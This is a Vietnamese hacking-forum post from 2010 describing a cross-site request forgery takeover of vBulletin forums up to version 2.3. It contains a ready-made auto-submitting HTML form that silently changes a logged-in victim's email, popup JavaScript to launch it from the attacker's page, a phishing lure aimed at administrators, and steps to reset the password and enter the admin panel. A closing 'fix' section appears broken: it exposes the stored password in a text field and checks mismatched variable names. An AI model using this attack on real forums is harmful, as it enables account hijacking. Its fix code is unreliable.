Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

 

 Hack Forum Vbulettin Board

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Hack Forum Vbulettin Board Empty
Bài gửiTiêu đề: Hack Forum Vbulettin Board   Hack Forum Vbulettin Board EmptySat Oct 23, 2010 5:40 pm

Cách này áp dụng chung cho tất cả các forum nào không đòi hỏi phải điền mật khẩu khi change email và đây là cách để hack forum vbb 2.3 trở xuống vì trong phiên bản mới 3.0 của vbb đã yêu cầu nhập password khi change email .

Bước 1 : tạo 1 file đặt tên là popup.htm có nội dung như sau :

<html>
<body onload="javascript:document.forms[0].submit();">
<center>
<table cellSpacing="0" cellPadding="0" width="100%" bgColor="#ffffff" border="0" height="168" style="border-collapse: collapse" bordercolor="#111111">
<tr>
<td height="148">
<p><br>
&nbsp;</p>
<p><br>
&nbsp;</p>
<center>
<p>
&nbsp;</p>
</center>
<form action="http://localhost/vbb/member.php" method="post">
<input type="hidden" value="" name="s">
<p>
<font face="verdana, arial, helvetica" size="2">
<input class="bginput" maxLength="150" type="hidden" size="30" value="mask_nbta_83@yahoo.com" name="email"></font><br>
<font face="verdana, arial, helvetica" size="2">
<input class="bginput" maxLength="150" type="hidden" size="30" value="mask_nbta_83@yahoo.com" name="emailconfirm"></font></p>
<table cellSpacing="0" cellPadding="2" width="100%" align="center" border="0" height="1">
<tr>
<td align="middle" height="1"><font face="verdana, arial, helvetica" size="2">
<input type="hidden" value="updateprofile" name="action">
<input class="bginput" accessKey="s" type="submit" value="Submit" name="Submit">&nbsp;
</font></td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</center>
</body>
</html>

bạn chú ý cái session , chúng ta nên để là khoảng trắng vì vì nó sẽ trả về session hiện tại của nạn nhân khi ta thay đồi email của họ .
Cái popup.htm này sẽ auto submit khi ta open nó ----> nạn nhân sẽ không hề hay biết họ đã bị change email .
Khi hack bạn chú ý thay đổi cái action cho phù hợp với website mà mình muốn hack .
Bạn có thể thay đổi cái email mask_nbta_83@yahoo.com thành email của mình hay email nào mà bạn muốn .

Bước 2 : Tôi gọi website của tôi là http://www.masknbta.com/index.htm .
Open source của cái index.htm , thêm đoạn code này vào :


<script language='JavaScript'>
window.open('popup.htm','Popup','width=30,height=30');
</script>

Khi nạn nhân view cái website của bạn thì 1 popup sẽ tự xuất hiện , và auto submit change email theo ý mình .

Buớc 3 : dụ dỗ nạn nhân vào website : có rất nhiều cách nhưng để thực hiên đươc mục tiêu thì nhất định nạn nhân phải đang login trong forum mà ta muốn hack , tôi sẽ đưa ra 1 cách minh hoạ : đăng kí 1 account trong forum , private cho victim với nội dung là check dùm secure cho website , và sau đó mọi chuyện sẽ diễn ra theo đúng ý ta nếu victim click vào link .
Sau khi change email thì bạn forgot password sau đó vào http://victim/admin/index.php với user và pass vừa có được .
Điểm đặc bịêt cần lưu ý là email của bạn đăng kí trong forum phải không được trùng với email mà bạn muốn victim thay đổi , nếu không thì sẽ không đạt kết quả .

Như vậy là đã xong cách hack .

Cách fix :

Mở file admin/vbulletin.style tìm

<tr>
<td bgcolor="{secondaltcolor}"><normalfont><b>Confirm Email Address:</b></normalfont></td>
<td bgcolor="{secondaltcolor}"><normalfont><input type="text" class="bginput" name="emailconfirm" value="$bbuserinfo[email]" size="30" maxlength="150"></normalfont></td>
</tr>

them vao ben duoi :

<tr>
<td bgcolor="{secondaltcolor}"><normalfont><b>Your password:</b></normalfont></td>
<td bgcolor="{secondaltcolor}"><normalfont><input type="text" class="bginput" name="pword" value="$bbuserinfo[password]" size="30" maxlength="150"></normalfont></td>
</tr>

Mở file /member.php , tìm:

if ($requireuniqueemail and $bbuserinfo['email']!=$email and $checkuser=$DB_site->query_first("SELECT userid,username,email FROM user WHERE email='".addslashes

thêm vào bên trên như thế này:


///////////////////////////////////////Mask's fix///////////////////////
if ($userinfo[password]!=$password)
{
die("Da duoc fix , dung hack vo ich");
}
////////////////////////////////////////////////////////////////////////

if ($requireuniqueemail and $bbuserinfo['email']!=$email and $checkuser=$DB_site->query_first("SELECT userid,username,email FROM user WHERE email='".addslashes


tim :

if ($email=="" or $emailconfirm=="")


them vao :


if ($email=="" or $emailconfirm=="" or $pword=="").
Về Đầu Trang Go down
 
Hack Forum Vbulettin Board
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Đánh lừa Invision Board
» Hack Forum PHPBB 1.4.0+1.4.1+1.4.2
» Một số thủ thuật hack forum
» Hack PBLang forum 4.0 qua cookie
» Lỗi trong Forum Yabb 1 Gold - Service Pack 1 và cách fix :

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến